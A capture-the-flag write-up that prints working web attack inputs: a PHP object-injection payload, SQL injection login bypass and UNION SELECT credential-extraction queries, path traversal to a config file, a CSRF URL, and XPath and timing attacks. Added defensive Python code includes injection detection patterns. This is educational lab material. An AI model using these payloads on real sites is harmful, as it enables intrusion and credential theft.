From the source code, it can clearly be seen that direct user input is passed to the unserialize function, which is a security risk and results in code execution. It can also be seen that a vulnerable magic method "__destruct" exists in the class named "CreateFile", which lives in the same context (file) as the unserialize call.
http://pastebin.com/raw.php?i=g2NQbr8P
readfile(dirname(__FILE__) . '/' . $this->tmpfile);
Anybody with a basic understanding of the object injection vulnerability knows that the values of class properties can be set at will by feeding crafted input to the "unserialize" function. Thus, we can set the value of "tmpfile", which is a member of the current class instance.
O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}
For anyone not familiar with serialization, here is the code I wrote to generate this payload:
http://pastebin.com/raw.php?i=FkUFveGpA
"KEY" was defined in the source code of unserialize.php.
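As an added example (not the writeup's code), a small Python parser for PHP's serialize() format that refuses any object token, the same effect as PHP 7's unserialize($data, ['allowed_classes' => false]); it rejects the CreateFile payload above while accepting a plain array. The sample inputs are constructed here, and the N, b, d and C tokens are left out for brevity.

```python
import re
# Added example (not the writeup's code): PHP serialize() parser that refuses objects, like unserialize($d, ['allowed_classes' => false]).
class PhpSerializeError(ValueError):
    pass
# i:INT;  s:LEN:"  a:COUNT:{  O:LEN:"Class":COUNT:{   (N, b, d, C omitted for brevity)
TOKEN = re.compile(r'i:(-?\d+);|s:(\d+):"|a:(\d+):\{|O:(\d+):"([^"]*)":(\d+):\{')

def parse_php_serialized(data, allow_objects=False):
    pos = 0
    def members(count):  # key;value pairs up to the closing '}'
        nonlocal pos
        items = {}
        for _ in range(count):
            key = parse()
            items[key] = parse()
        if data[pos] != '}':
            raise PhpSerializeError('expected } at %d' % pos)
        pos += 1
        return items
    def parse():
        nonlocal pos
        m = TOKEN.match(data, pos)
        if not m:
            raise PhpSerializeError('unsupported token at %d' % pos)
        pos = m.end()
        if m.group(1) is not None:  # integer
            return int(m.group(1))
        if m.group(2) is not None:  # string; PHP counts bytes, so ASCII input is assumed
            n = int(m.group(2))
            if data[pos + n:pos + n + 2] != '";':
                raise PhpSerializeError('string length mismatch at %d' % m.start())
            value, pos = data[pos:pos + n], pos + n + 2
            return value
        if m.group(3) is not None:  # array
            return members(int(m.group(3)))
        cls = m.group(5)  # object: this is the branch that would build the CreateFile gadget
        if not allow_objects or int(m.group(4)) != len(cls):
            raise PhpSerializeError('refusing object of class %r' % cls)
        return {'__class__': cls, 'props': members(int(m.group(6)))}
    return parse()

def is_safe_to_unserialize(data):  # gate to run before handing input to PHP's unserialize()
    try:
        return parse_php_serialized(data) is not None
    except (ValueError, IndexError):  # PhpSerializeError is a ValueError
        return False

# Constructed inputs: the payload from the writeup and a harmless array.
PAYLOAD = 'O:10:"CreateFile":1:{s:7:"tmpfile";s:15:"unserialize.php";}'
BENIGN = 'a:2:{s:4:"name";s:5:"alice";s:5:"score";i:42;}'
```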
And the credentials of a user account were also given.
Hint: It's awesome when other people do things for you, isn't it? ;)
The simulation of this hint, and so the biggest part of this challenge, is in the "fake_user.php" file.
/sendmoney.php?frommemberID=99999&memberID=1&member=John Smith&ammount=5
I tried tampering with the "frommemberID" parameter, but without success. It seemed the donation page was checking whether the "frommemberID" value matched that of the currently logged-in user. The resulting page had this message:
So you want to steal money?? This is not the correct way!
Then I remembered the hint, i.e. fake_user.php. That page was a user simulator. It also had other (a little too much) information. Here is the information mentioned there:
Welcome CSRF Master!
Below this text was a form with a field for the URL the victim would visit. To cut to the chase, the donation URL was meant to be submitted in the form on the "fake_user.php" page. So I tested it by pasting the same URL I had tried directly earlier, and here was the result:
As you already know, the donation form is vulnerable to CSRF.
You also know, that to become the richest in the bank and win the gorgeous prize you must steal some money from all the members in the bank.
Hey, not too much...max $5 (the donation budget)!
We know, and you too, that to do a CSRF attack we need a victim that follows our links.
Well, to simplify we have made the following form.
This form simulates a user logged in his members area that clicks on a given link.
http://pastebin.com/raw.php?i=QbXDbJhp
So after executing the script, I checked the balance page and this was the result:
First I thought of extracting the admin username and password from the database, but I figured that was unnecessary if the authentication page could be bypassed with the good old "x' or 'x'='x".
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'g00n' LIMIT 0,1' at line 5
/login.php?username=x' or 'x'='x&password=x' or 'x'='x
The result that this script generated can be seen in the screenshot below.
http://pastebin.com/raw.php?i=WfWv4zKf
This challenge has more than 150 solutions, but are you able to find the one that starts with «#? If yes, give me the MD5 of that value!
http://pastebin.com/raw.php?i=7kC5cvjh
if(document.getElementById("utb").value=="admin")
From this line, it was understood that the username was "admin".
if(document.getElementById("ptb").value.length!=7)
The next line in the JS code said that the password length should be 7.
Now comes the interesting part. It can be seen in the JS code that an "if" statement is used to verify the entered password, with six conditions combined by the logical AND (&&) operator. So I analyzed the first condition this way:
document.getElementById("ptb").value.charCodeAt(0) + document.getElementById("ptb").value.charCodeAt(1)==206
It's worth mentioning here that the JavaScript "charCodeAt" function returns the Unicode value of the character at the specified index in a string.
document.getElementById("ptb").value.charCodeAt(1) + document.getElementById("ptb").value.charCodeAt(2) == 201
Each condition says that the Unicode values of two adjacent characters of our password should add up to the given number (206 for the first pair, 201 for the next).
So I just used the JavaScript "fromCharCode" function, which converts Unicode values into characters, to calculate the password and then its MD5 hash.
- 171
- 35
- 166
- 18
- 159
- 21
- 177
http://pastebin.com/raw.php?i=FU1wsPXw
Here is the output:
0d6162bd63d6802283fa0c16514dc271
So this MD5 hash was the flag for this challenge.
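As an added example (not from the writeup), the family of passwords that those pairwise-sum conditions admit, solved in Python: the page quotes the sums 206 and 201, the other four are derived from the character codes listed above, and character codes are assumed to lie in 0..255 (which gives 178 candidates, consistent with the challenge's "more than 150 solutions"). The MD5 step is left out because the byte encoding of the non-ASCII characters before hashing is not stated on the page.

```python
# Added example, not the writeup's code. Each JS condition fixes charCodeAt(i) + charCodeAt(i+1).
# 206 and 201 are the sums quoted on the page; the other four are derived from the seven
# character codes listed in the writeup (166+18, 18+159, 159+21, 21+177).
PAIR_SUMS = [206, 201, 184, 177, 180, 198]

def solve_pair_sums(sums, max_code=255):
    """All code vectors c with c[i] + c[i+1] == sums[i] and 0 <= c[i] <= max_code.
    A pair-sum condition never pins a single character: choosing c[0] determines
    every other c[i], so the solutions form one family indexed by the first code.
    max_code=255 assumes Latin-1 characters; charCodeAt itself allows up to 65535."""
    solutions = []
    for first in range(max_code + 1):
        codes = [first]
        for s in sums:
            codes.append(s - codes[-1])
        if all(0 <= c <= max_code for c in codes):
            solutions.append(codes)
    return solutions

def password_from_codes(codes):
    """The JS String.fromCharCode step."""
    return ''.join(chr(c) for c in codes)

def with_prefix(solutions, prefix):
    """Filter the family down to the candidates whose text starts with prefix."""
    return [c for c in solutions if password_from_codes(c).startswith(prefix)]

def solve_challenge():
    """The challenge asked for the one solution starting with «# (U+00AB, U+0023)."""
    family = solve_pair_sums(PAIR_SUMS)
    return len(family), with_prefix(family, '\xab#')
```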
/about.php?a=industrialization
After some attempts, I discovered that a config file (config.php) existed in a directory named "config", located in the parent directory of the current location. So I simply used the following URL to read the contents of the config file:
/about.php?a=../config/config.php
The output said: "Ops, where is the salt?! Yes it is here...."
/beer.php?id=1' union select 1,CONCAT_WS(CHAR(32,58,32),id,name,surname,username,password),3 from users where name="kelly" and surname="green" and 'x'='x
Here is the output:
22 : Kelly : Green : S0ZH8BR22J5 : UzA5T05UWTRkZnNhNzgwZnNkNmI3OGY2YmRzNmFmdDg3NmFzZDY1OGE=
So after entering this hash, the final stage was unlocked.
As you can see, the dbms is MySQL. In this dbms the comments on tables are stored into the INFORMATION_SCHEMA db, inside the table TABLE.
This hint made it pretty obvious that the encoding or encryption algorithm was stored in the table comments. So I used the following query to extract the comment of the table "users":
/beer.php?id=1' union select 1,table_comment,3 from information_schema.tables where table_schema=database() and table_name="users" and 'x'='x
Here is the output:
password = base64(base64(password) + salt)
So I had the salt, which I had extracted in the first stage, and the password hash, which I had extracted in the second stage, and now I had the algorithm as well. It took only a few seconds to decode the hash and get its plain-text.
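As an added example (not from the writeup), the stored-password scheme from that table comment written out in Python, beside a PBKDF2-based replacement (my choice, not anything from the challenge); the password and salt values are constructed, not the challenge's.

```python
import base64
import hashlib
import hmac
import os

# Added example, not the writeup's code. The table comment gave
# password = base64(base64(password) + salt): an encoding, not a hash, so it is reversible.
def legacy_store(password, salt):
    inner = base64.b64encode(password.encode()).decode()
    return base64.b64encode((inner + salt).encode()).decode()

def legacy_recover(stored, salt):
    """Invert the scheme with nothing but the salt from config.php (no guessing needed)."""
    inner = base64.b64decode(stored).decode()
    if not salt or not inner.endswith(salt):
        raise ValueError('stored value does not end with the expected salt')
    return base64.b64decode(inner[:len(inner) - len(salt)]).decode()

# Hardened replacement (assumption, not from the challenge): PBKDF2-HMAC-SHA256 with a
# random per-user salt and the iteration count stored next to the digest.
def hardened_store(password, salt=None, iterations=200_000):
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, iterations)
    return 'pbkdf2_sha256$%d$%s$%s' % (iterations, salt.hex(), digest.hex())

def hardened_verify(password, stored):
    _, iters, salt_hex, digest_hex = stored.split('$')
    digest = hashlib.pbkdf2_hmac('sha256', password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), digest_hex)

# Constructed demo values (not the challenge's salt or password).
DEMO_SALT = 'c0nstructedSalt'
DEMO_STORED = legacy_store('hunter2', DEMO_SALT)
```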
Your goal: find the secret hidden among the information sent by a special customer.
This challenge had a small PHP application for a restaurant website. Two of the three pages had nothing of a pen-tester's interest, but the third page had a form for seat reservation. It also had a link to another page to check the status of a reservation by providing an email and phone number.
Negative:
URL: /checkreservation.php
POST data: phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='1
URL: /checkreservation.php
POST data: phone=999-9999-9999&email=t3hg00n@yahoo.com' and '1'='2
Later I realized I could send the same parameters in a GET request as well (not important, but it makes things a bit easier). Anyway, I started exploiting it manually using XPath's "substring" function, but I soon realized it was going to take an eternity this way. So I tried a Python tool named "xcat". It worked, but it was so slow that it took about 30 minutes to extract the information of the first user in the document, and the secret was not stored in the first user's information. What a disappointment that was! By the time it reached the 4th user the session had expired, and the secret had still not been found. But it did help, because now I knew the element names and I could figure out which element contained the required secret message. This was the structure of the XML document:
http://pastebin.com/raw.php?i=kEQdcGF7
So I wrote a little PHP script to extract only the text of the "info" element, which I believed contained the secret. First I manually discovered the length of the text in the "info" element and then used the script to extract the contents. I started from the second user, as I already knew that the first user's info didn't have the required secret, and found the secret in the info of the 7th user.
http://pastebin.com/raw.php?i=REiFeShx
Here is the output it generated:
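As an added example (not from the writeup), detection logic in Python for the request shapes used across these challenges: the quote-closed boolean clauses of the login bypass and of the reservation checks above, the UNION SELECT and information_schema queries, and the ../ traversal into config.php; it runs over constructed log lines modelled on those requests.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Added example, not the writeup's code: flag the injection shapes used in these challenges
# wherever they appear in a request's query string or form body.
SIGNATURES = [
    ('boolean-clause', re.compile(r"'\s*(?:or|and)\s*'[^']*'\s*=\s*'", re.I)),  # x' or 'x'='x, ' and '1'='1
    ('union-select', re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ('schema-probe', re.compile(r"\binformation_schema\b", re.I)),
    ('traversal', re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")),  # ../config/config.php
]

def scan_params(params):
    """params: list of (name, value) pairs as the server sees them after URL decoding."""
    hits = []
    for name, value in params:
        for label, rx in SIGNATURES:
            if rx.search(value):
                hits.append((name, label))
    return hits

def scan_request(target, body=''):
    """Decode the query string and an x-www-form-urlencoded body, then scan both."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    params += parse_qsl(body, keep_blank_values=True)
    return scan_params(params)

def scan_log(lines):
    """lines: 'METHOD TARGET [BODY]' entries; returns {line_index: hits} for flagged lines."""
    report = {}
    for i, line in enumerate(lines):
        _method, target, *rest = line.split(' ', 2)
        hits = scan_request(target, rest[0] if rest else '')
        if hits:
            report[i] = hits
    return report

# Constructed log lines modelled on the requests in the writeup (not captured traffic).
SAMPLE_LOG = [
    "GET /login.php?username=x'%20or%20'x'='x&password=x'%20or%20'x'='x",
    "GET /about.php?a=../config/config.php",
    "GET /beer.php?id=1'%20union%20select%201,table_comment,3%20from%20information_schema.tables%20where%20table_schema=database()%20and%20'x'='x",
    "POST /checkreservation.php phone=999-9999-9999&email=t3hg00n@yahoo.com'%20and%20'1'='1",
    "GET /beer.php?id=1",
]
```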
URL: /index.php
POST data: password=test
And here is the resulting page:
URL: /index.php?debug
POST data: password=test
At first the result looked exactly the same. But after checking the source, I discovered that there was some additional content in the result: an HTML comment, which can be seen in the screenshot below.
password=t
When I changed the letter 't' to something else, the time again became zero. I tried all the characters on the keyboard and the time remained zero. After putting 't' back, the time was again 0.1. At this point I figured that the first letter of the password might be 't', because it was getting past the checks and there must be some processing going on for valid characters which takes some time, hence the increase in time. So after that I added one letter after 't' and tried password=ta, but the time remained the same, i.e. 0.1. So once again I replaced 'a' with every character on my keyboard one after another, and when I had finished the upper- and lower-case alphabets, I inputted password=t1 and this was the result:
http://pastebin.com/raw.php?i=HkFCU2K6
It was a little fun coding this one. Here is the output it generated:
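As an added example (not from the writeup), a Python model of the check that the debug timer exposed: an early-exit comparison whose cost grows with the matching prefix, beside a constant-time comparison; the secret and the probe sequence are constructed, and cost is counted in work units rather than real seconds.

```python
import hashlib
import hmac

# Added example, not the writeup's code. The debug comment revealed a timer that grew by
# 0.1 s for every correct leading character; here that cost is counted in work units.
SECRET = 'tango'  # constructed secret, not the challenge's password

def leaky_check(secret, guess):
    """Character-by-character comparison with early exit. Returns (matches, work_units);
    work_units equals the length of the matching prefix, which is the oracle the writeup used."""
    work = 0
    for i, ch in enumerate(guess):
        if i >= len(secret) or secret[i] != ch:
            return False, work
        work += 1  # the per-character processing that shows up as extra time
    return len(guess) == len(secret), work

def constant_time_check(secret, guess):
    """Hash both sides to a fixed length and compare with hmac.compare_digest, so the
    work does not depend on how many leading characters are right. Returns (matches, 1)."""
    a = hashlib.sha256(secret.encode()).digest()
    b = hashlib.sha256(guess.encode()).digest()
    return hmac.compare_digest(a, b), 1

def timing_profile(check, secret, guesses):
    """Work units per guess: a rising staircase for the leaky check, flat for the fixed one."""
    return [check(secret, g)[1] for g in guesses]

GUESSES = ['x', 't', 'ta', 'tx', 'tan', 'tango', 'tangos']  # constructed probe sequence
```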